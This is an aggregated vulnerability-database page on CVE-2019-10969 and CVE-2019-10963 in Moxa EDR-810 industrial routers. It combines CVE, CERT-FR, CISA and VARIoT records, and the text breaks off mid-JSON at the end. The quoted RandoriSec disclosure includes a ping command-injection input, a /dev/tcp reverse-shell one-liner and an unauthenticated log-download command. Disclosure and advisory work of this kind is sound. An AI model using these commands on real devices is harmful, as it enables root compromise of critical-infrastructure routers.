CVE-2019-10969 (GCVE-0-2019-10969)

Vulnerability from cvelistv5 – Published: 2019-10-08 18:41 – Updated: 2024-08-04 22:40

Summary

Severity ?

No CVSS data available.

CWE

CWE-20 - IMPROPER INPUT VALIDATION CWE-20

Assigner

icscert

References

URL

Tags

	https://www.us-cert.gov/ics/advisories/icsa-19-274-03	x_refsource_MISC
	http://packetstormsecurity.com/files/154943/Moxa-…	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	n/a	Moxa EDR 810	Affected: All versions 5.1 and prior

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T22:40:15.499Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.us-cert.gov/ics/advisories/icsa-19-274-03"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/154943/Moxa-EDR-810-Command-Injection-Information-Disclosure.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Moxa EDR 810",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "All versions 5.1 and prior"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Moxa EDR 810, all versions 5.1 and prior, allows an authenticated attacker to abuse the ping feature to execute unauthorized commands on the router, which may allow an attacker to perform remote code execution."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-20",
              "description": "IMPROPER INPUT VALIDATION CWE-20",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2019-10-23T19:06:27",
        "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6",
        "shortName": "icscert"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.us-cert.gov/ics/advisories/icsa-19-274-03"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/154943/Moxa-EDR-810-Command-Injection-Information-Disclosure.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "ics-cert@hq.dhs.gov",
          "ID": "CVE-2019-10969",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "Moxa EDR 810",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "All versions 5.1 and prior"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Moxa EDR 810, all versions 5.1 and prior, allows an authenticated attacker to abuse the ping feature to execute unauthorized commands on the router, which may allow an attacker to perform remote code execution."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "IMPROPER INPUT VALIDATION CWE-20"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.us-cert.gov/ics/advisories/icsa-19-274-03",
              "refsource": "MISC",
              "url": "https://www.us-cert.gov/ics/advisories/icsa-19-274-03"
            },
            {
              "name": "http://packetstormsecurity.com/files/154943/Moxa-EDR-810-Command-Injection-Information-Disclosure.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/154943/Moxa-EDR-810-Command-Injection-Information-Disclosure.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6",
    "assignerShortName": "icscert",
    "cveId": "CVE-2019-10969",
    "datePublished": "2019-10-08T18:41:28",
    "dateReserved": "2019-04-08T00:00:00",
    "dateUpdated": "2024-08-04T22:40:15.499Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "fkie_nvd": {
      "configurations": "[{\"operator\": \"AND\", \"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:moxa:edr-810_firmware:*:*:*:*:*:*:*:*\", \"versionEndIncluding\": \"5.1\", \"matchCriteriaId\": \"A28DDE8C-B6D2-49CD-86D0-7B4DB121C642\"}]}, {\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": false, \"criteria\": \"cpe:2.3:h:moxa:edr-810:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"2A6BD14C-FD19-4AF7-A221-91B1A49C0A58\"}]}]}]",
      "descriptions": "[{\"lang\": \"en\", \"value\": \"Moxa EDR 810, all versions 5.1 and prior, allows an authenticated attacker to abuse the ping feature to execute unauthorized commands on the router, which may allow an attacker to perform remote code execution.\"}, {\"lang\": \"es\", \"value\": \"Moxa EDR 810, todas las versiones 5.1 y anteriores, permite a un atacante autenticado abusar de la funcionalidad ping para ejecutar comandos no autorizados en el enrutador, lo que puede permitir a un atacante realizar la ejecuci\\u00f3n de c\\u00f3digo remota.\"}]",
      "id": "CVE-2019-10969",
      "lastModified": "2024-11-21T04:20:16.020",
      "metrics": "{\"cvssMetricV31\": [{\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\", \"baseScore\": 7.2, \"baseSeverity\": \"HIGH\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"HIGH\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"availabilityImpact\": \"HIGH\"}, \"exploitabilityScore\": 1.2, \"impactScore\": 5.9}], \"cvssMetricV2\": [{\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"2.0\", \"vectorString\": \"AV:N/AC:L/Au:S/C:P/I:P/A:P\", \"baseScore\": 6.5, \"accessVector\": \"NETWORK\", \"accessComplexity\": \"LOW\", \"authentication\": \"SINGLE\", \"confidentialityImpact\": \"PARTIAL\", \"integrityImpact\": \"PARTIAL\", \"availabilityImpact\": \"PARTIAL\"}, \"baseSeverity\": \"MEDIUM\", \"exploitabilityScore\": 8.0, \"impactScore\": 6.4, \"acInsufInfo\": false, \"obtainAllPrivilege\": false, \"obtainUserPrivilege\": false, \"obtainOtherPrivilege\": false, \"userInteractionRequired\": false}]}",
      "published": "2019-10-08T19:15:09.963",
      "references": "[{\"url\": \"http://packetstormsecurity.com/files/154943/Moxa-EDR-810-Command-Injection-Information-Disclosure.html\", \"source\": \"ics-cert@hq.dhs.gov\"}, {\"url\": \"https://www.us-cert.gov/ics/advisories/icsa-19-274-03\", \"source\": \"ics-cert@hq.dhs.gov\", \"tags\": [\"Third Party Advisory\", \"US Government Resource\"]}, {\"url\": \"http://packetstormsecurity.com/files/154943/Moxa-EDR-810-Command-Injection-Information-Disclosure.html\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}, {\"url\": \"https://www.us-cert.gov/ics/advisories/icsa-19-274-03\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Third Party Advisory\", \"US Government Resource\"]}]",
      "sourceIdentifier": "ics-cert@hq.dhs.gov",
      "vulnStatus": "Modified",
      "weaknesses": "[{\"source\": \"ics-cert@hq.dhs.gov\", \"type\": \"Secondary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-20\"}]}, {\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-20\"}]}]"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2019-10969\",\"sourceIdentifier\":\"ics-cert@hq.dhs.gov\",\"published\":\"2019-10-08T19:15:09.963\",\"lastModified\":\"2024-11-21T04:20:16.020\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Moxa EDR 810, all versions 5.1 and prior, allows an authenticated attacker to abuse the ping feature to execute unauthorized commands on the router, which may allow an attacker to perform remote code execution.\"},{\"lang\":\"es\",\"value\":\"Moxa EDR 810, todas las versiones 5.1 y anteriores, permite a un atacante autenticado abusar de la funcionalidad ping para ejecutar comandos no autorizados en el enrutador, lo que puede permitir a un atacante realizar la ejecuci\u00f3n de c\u00f3digo remota.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":7.2,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"HIGH\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.2,\"impactScore\":5.9}],\"cvssMetricV2\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"2.0\",\"vectorString\":\"AV:N/AC:L/Au:S/C:P/I:P/A:P\",\"baseScore\":6.5,\"accessVector\":\"NETWORK\",\"accessComplexity\":\"LOW\",\"authentication\":\"SINGLE\",\"confidentialityImpact\":\"PARTIAL\",\"integrityImpact\":\"PARTIAL\",\"availabilityImpact\":\"PARTIAL\"},\"baseSeverity\":\"MEDIUM\",\"exploitabilityScore\":8.0,\"impactScore\":6.4,\"acInsufInfo\":false,\"obtainAllPrivilege\":false,\"obtainUserPrivilege\":false,\"obtainOtherPrivilege\":false,\"userInteractionRequired\":false}]},\"weaknesses\":[{\"source\":\"ics-cert@hq.dhs.gov\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-20\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-20\"}]}],\"configurations\":[{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:moxa:edr-810_firmware:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"5.1\",\"matchCriteriaId\":\"A28DDE8C-B6D2-49CD-86D0-7B4DB121C642\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:moxa:edr-810:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"2A6BD14C-FD19-4AF7-A221-91B1A49C0A58\"}]}]}],\"references\":[{\"url\":\"http://packetstormsecurity.com/files/154943/Moxa-EDR-810-Command-Injection-Information-Disclosure.html\",\"source\":\"ics-cert@hq.dhs.gov\"},{\"url\":\"https://www.us-cert.gov/ics/advisories/icsa-19-274-03\",\"source\":\"ics-cert@hq.dhs.gov\",\"tags\":[\"Third Party Advisory\",\"US Government Resource\"]},{\"url\":\"http://packetstormsecurity.com/files/154943/Moxa-EDR-810-Command-Injection-Information-Disclosure.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://www.us-cert.gov/ics/advisories/icsa-19-274-03\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Third Party Advisory\",\"US Government Resource\"]}]}}"
  }
}

CERTFR-2019-AVI-476

Vulnerability from certfr_avis - Published: - Updated:

De multiples vulnérabilités ont été découvertes dans les routeurs Moxa Séries EDR-810. Elles permettent à un attaquant de provoquer une atteinte à la confidentialité des données, une exécution de code arbitraire et une élévation de privilèges.

Solution

Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).

None

Impacted products

	Vendor	Product	Description
	Moxa	N/A	Séries EDR-810 avec un microgiciel versions 5.1 et antérieures

References

Title

Publication Time

Tags

Bulletin de sécurité Moxa du 30 septembre 2019

None

vendor-advisory

Show details on source website

JSON

To clipboard

{
  "$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
  "affected_systems": [
    {
      "description": "S\u00e9ries EDR-810 avec un microgiciel versions 5.1 et ant\u00e9rieures",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "Moxa",
          "scada": true
        }
      }
    }
  ],
  "affected_systems_content": null,
  "content": "## Solution\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des\ncorrectifs (cf. section Documentation).\n",
  "cves": [
    {
      "name": "CVE-2019-10969",
      "url": "https://www.cve.org/CVERecord?id=CVE-2019-10969"
    },
    {
      "name": "CVE-2019-10963",
      "url": "https://www.cve.org/CVERecord?id=CVE-2019-10963"
    }
  ],
  "links": [],
  "reference": "CERTFR-2019-AVI-476",
  "revisions": [
    {
      "description": "Version initiale",
      "revision_date": "2019-09-30T00:00:00.000000"
    }
  ],
  "risks": [
    {
      "description": "Ex\u00e9cution de code arbitraire"
    },
    {
      "description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
    },
    {
      "description": "\u00c9l\u00e9vation de privil\u00e8ges"
    }
  ],
  "summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les routeurs Moxa\nS\u00e9ries EDR-810. Elles permettent \u00e0 un attaquant de provoquer une\natteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es, une ex\u00e9cution de code\narbitraire et une \u00e9l\u00e9vation de privil\u00e8ges.\n",
  "title": "Multiples vuln\u00e9rabilit\u00e9s dans les routeurs Moxa S\u00e9ries EDR-810",
  "vendor_advisories": [
    {
      "published_at": null,
      "title": "Bulletin de s\u00e9curit\u00e9 Moxa du 30 septembre 2019",
      "url": "https://www.moxa.com/en/support/support/security-advisory/edr-810-series-secure-router-vulnerabilities-(1)"
    }
  ]
}

CERTFR-2019-AVI-476

Vulnerability from certfr_avis - Published: - Updated:

Solution

Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).

None

Impacted products

	Vendor	Product	Description
	Moxa	N/A	Séries EDR-810 avec un microgiciel versions 5.1 et antérieures

References

Title

Publication Time

Tags

Bulletin de sécurité Moxa du 30 septembre 2019

None

vendor-advisory

Show details on source website

JSON

To clipboard

{
  "$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
  "affected_systems": [
    {
      "description": "S\u00e9ries EDR-810 avec un microgiciel versions 5.1 et ant\u00e9rieures",
      "product": {
        "name": "N/A",
        "vendor": {
          "name": "Moxa",
          "scada": true
        }
      }
    }
  ],
  "affected_systems_content": null,
  "content": "## Solution\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des\ncorrectifs (cf. section Documentation).\n",
  "cves": [
    {
      "name": "CVE-2019-10969",
      "url": "https://www.cve.org/CVERecord?id=CVE-2019-10969"
    },
    {
      "name": "CVE-2019-10963",
      "url": "https://www.cve.org/CVERecord?id=CVE-2019-10963"
    }
  ],
  "links": [],
  "reference": "CERTFR-2019-AVI-476",
  "revisions": [
    {
      "description": "Version initiale",
      "revision_date": "2019-09-30T00:00:00.000000"
    }
  ],
  "risks": [
    {
      "description": "Ex\u00e9cution de code arbitraire"
    },
    {
      "description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
    },
    {
      "description": "\u00c9l\u00e9vation de privil\u00e8ges"
    }
  ],
  "summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les routeurs Moxa\nS\u00e9ries EDR-810. Elles permettent \u00e0 un attaquant de provoquer une\natteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es, une ex\u00e9cution de code\narbitraire et une \u00e9l\u00e9vation de privil\u00e8ges.\n",
  "title": "Multiples vuln\u00e9rabilit\u00e9s dans les routeurs Moxa S\u00e9ries EDR-810",
  "vendor_advisories": [
    {
      "published_at": null,
      "title": "Bulletin de s\u00e9curit\u00e9 Moxa du 30 septembre 2019",
      "url": "https://www.moxa.com/en/support/support/security-advisory/edr-810-series-secure-router-vulnerabilities-(1)"
    }
  ]
}

ICSA-19-274-03

Vulnerability from csaf_cisa - Published: 2019-10-01 00:00 - Updated: 2019-10-01 00:00

Summary

Moxa EDR 810 Series

Notes

CISA Disclaimer

This CSAF advisory was extracted from unstructured data and may contain inaccuracies. If you notice any errors, please reach out to the designated contact at CISA CSAF: central@cisa.dhs.gov

Legal Notice

All information products included in https://us-cert.cisa.gov/ics are provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained within. DHS does not endorse any commercial product or service, referenced in this product or otherwise. Further dissemination of this product is governed by the Traffic Light Protocol (TLP) marking in the header. For more information about TLP, see https://us-cert.cisa.gov/tlp/.

Risk evaluation

Successful exploitation of these vulnerabilities could allow remote code execution or access to sensitive information.

Critical infrastructure sectors

Critical Manufacturing, Energy, Water and Wastewater Systems

Countries/areas deployed

Worldwide

Company headquarters location

Taiwan

Recommended Practices

CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should:

Recommended Practices

CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. CISA also provides a section for control systems security recommended practices on the ICS webpage onus-cert.gov. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.

Recommended Practices

Additional mitigation guidance and recommended practices are publicly available on the ICS webpage on us-cert.gov in the Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. Organizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents.

JSON

To clipboard

{
  "document": {
    "acknowledgments": [
      {
        "names": [
          "Guillaume Lopes"
        ],
        "organization": "Randorisec",
        "summary": "reporting these vulnerabilities to CISA"
      }
    ],
    "category": "csaf_security_advisory",
    "csaf_version": "2.0",
    "distribution": {
      "text": "Disclosure is not limited",
      "tlp": {
        "label": "WHITE",
        "url": "https://us-cert.cisa.gov/tlp/"
      }
    },
    "lang": "en-US",
    "notes": [
      {
        "category": "general",
        "text": "This CSAF advisory was extracted from unstructured data and may contain inaccuracies. If you notice any errors, please reach out to the designated contact at CISA CSAF: central@cisa.dhs.gov",
        "title": "CISA Disclaimer"
      },
      {
        "category": "legal_disclaimer",
        "text": "All information products included in https://us-cert.cisa.gov/ics are provided \"as is\" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained within. DHS does not endorse any commercial product or service, referenced in this product or otherwise. Further dissemination of this product is governed by the Traffic Light Protocol (TLP) marking in the header. For more information about TLP, see https://us-cert.cisa.gov/tlp/.",
        "title": "Legal Notice"
      },
      {
        "category": "summary",
        "text": "Successful exploitation of these vulnerabilities could allow remote code execution or access to sensitive information.",
        "title": "Risk evaluation"
      },
      {
        "category": "other",
        "text": "Critical Manufacturing, Energy, Water and Wastewater Systems",
        "title": "Critical infrastructure sectors"
      },
      {
        "category": "other",
        "text": "Worldwide",
        "title": "Countries/areas deployed"
      },
      {
        "category": "other",
        "text": "Taiwan",
        "title": "Company headquarters location"
      },
      {
        "category": "general",
        "text": "CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should:",
        "title": "Recommended Practices"
      },
      {
        "category": "general",
        "text": "CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\nCISA also provides a section for control systems security recommended practices on the ICS webpage onus-cert.gov. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.",
        "title": "Recommended Practices"
      },
      {
        "category": "general",
        "text": "Additional mitigation guidance and recommended practices are publicly available on the ICS webpage on us-cert.gov in the Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents.",
        "title": "Recommended Practices"
      }
    ],
    "publisher": {
      "category": "coordinator",
      "contact_details": "Email: CISAservicedesk@cisa.dhs.gov;\n Toll Free: 1-888-282-0870",
      "name": "CISA",
      "namespace": "https://www.cisa.gov/"
    },
    "references": [
      {
        "category": "self",
        "summary": "ICS Advisory ICSA-19-274-03 JSON",
        "url": "https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/OT/white/2019/icsa-19-274-03.json"
      },
      {
        "category": "self",
        "summary": "ICS Advisory ICSA-19-274-03 Web Version",
        "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-19-274-03"
      },
      {
        "category": "external",
        "summary": "Recommended Practices",
        "url": "https://www.us-cert.gov/ics/alerts/ICS-ALERT-10-301-01"
      },
      {
        "category": "external",
        "summary": "Recommended Practices",
        "url": "https://www.us-cert.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf"
      },
      {
        "category": "external",
        "summary": "Recommended Practices",
        "url": "https://www.us-cert.gov/ics/tips/ICS-TIP-12-146-01B"
      }
    ],
    "title": "Moxa EDR 810 Series",
    "tracking": {
      "current_release_date": "2019-10-01T00:00:00.000000Z",
      "generator": {
        "engine": {
          "name": "CISA CSAF Generator",
          "version": "1.0.0"
        }
      },
      "id": "ICSA-19-274-03",
      "initial_release_date": "2019-10-01T00:00:00.000000Z",
      "revision_history": [
        {
          "date": "2019-10-01T00:00:00.000000Z",
          "legacy_version": "Initial",
          "number": "1",
          "summary": "ICSA-19-274-03 Moxa EDR 810 Series"
        }
      ],
      "status": "final",
      "version": "1"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version_range",
                "name": "\u003c= 5.1",
                "product": {
                  "name": "EDR-810: All versions 5.1 and prior",
                  "product_id": "CSAFPID-0001"
                }
              }
            ],
            "category": "product_name",
            "name": "EDR-810"
          }
        ],
        "category": "vendor",
        "name": "Moxa"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2019-10969",
      "cwe": {
        "id": "CWE-20",
        "name": "Improper Input Validation"
      },
      "notes": [
        {
          "category": "summary",
          "text": "An authenticated attacker may abuse the ping feature to execute unauthorized commands on the router, which could allow an attacker to perform remote code execution.CVE-2019-10969 has been assigned to this vulnerability. A CVSS v3 base score of 7.2 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H).",
          "title": "Vulnerability Summary"
        }
      ],
      "product_status": {
        "known_affected": [
          "CSAFPID-0001"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "web.nvd.nist.gov",
          "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-10969"
        },
        {
          "category": "external",
          "summary": "www.first.org",
          "url": "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
        }
      ],
      "remediations": [
        {
          "category": "mitigation",
          "details": "Moxa recommends users upgrade to the latest firmware, v5.2 or later.",
          "product_ids": [
            "CSAFPID-0001"
          ],
          "url": "https://www.moxa.com/en/support/product-support/software-and-documentation/search?psid=48041"
        },
        {
          "category": "mitigation",
          "details": "For more information, please see Moxa\u0027s security advisory.",
          "product_ids": [
            "CSAFPID-0001"
          ],
          "url": "https://www.moxa.com/en/support/support/security-advisory/edr-810-series-secure-router-vulnerabilities-(1)"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          "products": [
            "CSAFPID-0001"
          ]
        }
      ]
    },
    {
      "cve": "CVE-2019-10963",
      "cwe": {
        "id": "CWE-284",
        "name": "Improper Access Control"
      },
      "notes": [
        {
          "category": "summary",
          "text": "An unauthenticated attacker may be able to retrieve some log files from the device, which may allow sensitive information disclosure. Log files must have previously been exported by a legitimate user.CVE-2019-10963 has been assigned to this vulnerability. A CVSS v3 base score of 4.3 has been calculated; the CVSS vector string is (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N).",
          "title": "Vulnerability Summary"
        }
      ],
      "product_status": {
        "known_affected": [
          "CSAFPID-0001"
        ]
      },
      "references": [
        {
          "category": "external",
          "summary": "web.nvd.nist.gov",
          "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-10963"
        },
        {
          "category": "external",
          "summary": "www.first.org",
          "url": "https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N"
        }
      ],
      "remediations": [
        {
          "category": "mitigation",
          "details": "Moxa recommends users upgrade to the latest firmware, v5.2 or later.",
          "product_ids": [
            "CSAFPID-0001"
          ],
          "url": "https://www.moxa.com/en/support/product-support/software-and-documentation/search?psid=48041"
        },
        {
          "category": "mitigation",
          "details": "For more information, please see Moxa\u0027s security advisory.",
          "product_ids": [
            "CSAFPID-0001"
          ],
          "url": "https://www.moxa.com/en/support/support/security-advisory/edr-810-series-secure-router-vulnerabilities-(1)"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N",
            "version": "3.0"
          },
          "products": [
            "CSAFPID-0001"
          ]
        }
      ]
    }
  ]
}

VAR-201910-1593

Vulnerability from variot - Updated: 2023-12-18 12:43

Moxa EDR 810, all versions 5.1 and prior, allows an authenticated attacker to abuse the ping feature to execute unauthorized commands on the router, which may allow an attacker to perform remote code execution. Moxa EDR 810 Contains an input validation vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Moxa EDR-810 is a highly integrated industrial multi-port security router with firewall / NAT / VPN and hosted Layer 2 switch functions.

Moxa EDR-810 5.1 and earlier has a remote code execution vulnerability. An attacker could use this vulnerability to implement remote code execution. Moxa EDR 810 is an Ethernet router manufactured by Moxa Company in Taiwan, China. During an engagement for a client, RandoriSec found 2 vulnerabilities on Moxa EDR-810 Series Secure Routers. The first one is a command injection vulnerability found on the CLI allowing an authenticated user to obtain root privileges. And the other one is an improper access control found on the web server allowing to retrieve log files.

As usual, we reported those issues directly to Moxa and ICS-CERT (Industrial Control Systems Cyber Emergency Response Team) in order to â€œresponsible discloseâ€ them.

The ICS-CERT advisory was published on their website and a new EDR-810 firmware was provided by Moxa.

Many thanks to Moxa and ICS-CERT teams for their help.

Advisory

The following two product vulnerabilities were identified in Moxaâ€™s EDR-810 Series Secure Routers, all versions 5.1 and prior are vulnerable:

CVE-2019-10969: An exploitable command injection vulnerability exists in the CLI functionality, which is provided by the Telnet and SSH services. As the CLI is executed with root privileges, it is possible to obtain a root shell on the device. A CVSS v3 base score of 7.2 has been calculated. CVE-2019-10963: An unauthenticated attacker can retrieve all the log files (Firewall, IPSec and System) from the webserver. In order to exploit the issue, a legitimate user had to export the log files previously. A CVSS v3 base score of 4.3 has been calculated.

Exploitation

CVE-2019-10969 - Ping Command Injection

The Telnet and SSH services provide a Command Line Interface (CLI), which is a restricted shell allowing to perform a subset of actions on the device. The ping function of the CLI is vulnerable to command injection. It is possible to specify a specific hostname, such as ($/bin/bash), in order to obtain a shell as shown below:

Ping command injection

Due to limitations on the CLI, it is not possible to use the shell as is. The attacker can use a reverse shell as shown below: bash -i >& /dev/tcp/YOUR_IP_ADDRESS/1234 0>&1

CVE-2019-10963 - Missing Access Control On Log Files

When a legitimate user (admin or configadmin for instance) export the logs files from the MOXA router. The files are stored at the root of the webserver, as follow:

http://IP_ADDRESS_MOXA/MOXA_All_LOG.tar.gz An attacker can retrieve this archive without being authenticated on the Web interface as shown below:

wget http://192.168.0.1/MOXA_All_LOG.tar.gz

--2019-02-13 17:35:19-- http://192.168.0.1/MOXA_All_LOG.tar.gz Connexion Ã 192.168.0.1:80... connectÃ©. requÃªte HTTP transmise, en attente de la rÃ©ponse... 200 OK Taille : 15724 (15K) [text/plain] Sauvegarde en : " MOXA_All_LOG.tar.gz "

MOXA_All_LOG.tar.gz 100%[====================================================================================================================================>] 15,36K --.-KB/s ds 0s

2019-02-13 17:35:19 (152 MB/s) - " MOXA_All_LOG.tar.gz " sauvegardÃ© [15724/15724]

tar ztvf MOXA_All_LOG.tar.gz

drwxr-xr-x admin/root 0 2019-02-13 11:55 moxa_log_all/ -rw-r--r-- admin/root 326899 2019-02-13 11:55 moxa_log_all/MOXA_Firewall_LOG.ini -rw-r--r-- admin/root 156 2019-02-13 11:55 moxa_log_all/MOXA_IPSec_LOG.ini -rw-r--r-- admin/root 68465 2019-02-13 11:55 moxa_log_all/MOXA_LOG.ini

Mitigation

It is recommended to install at least the firmware version 5.3 from Moxa website.

Timeline

2019-02-24: Vendor Disclosure 2019-02-24: Advisory sent to ICS-CERT 2019-09-30: Advisory published by Moxa 2019-10-01: Advisory published by ICS-CERT

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
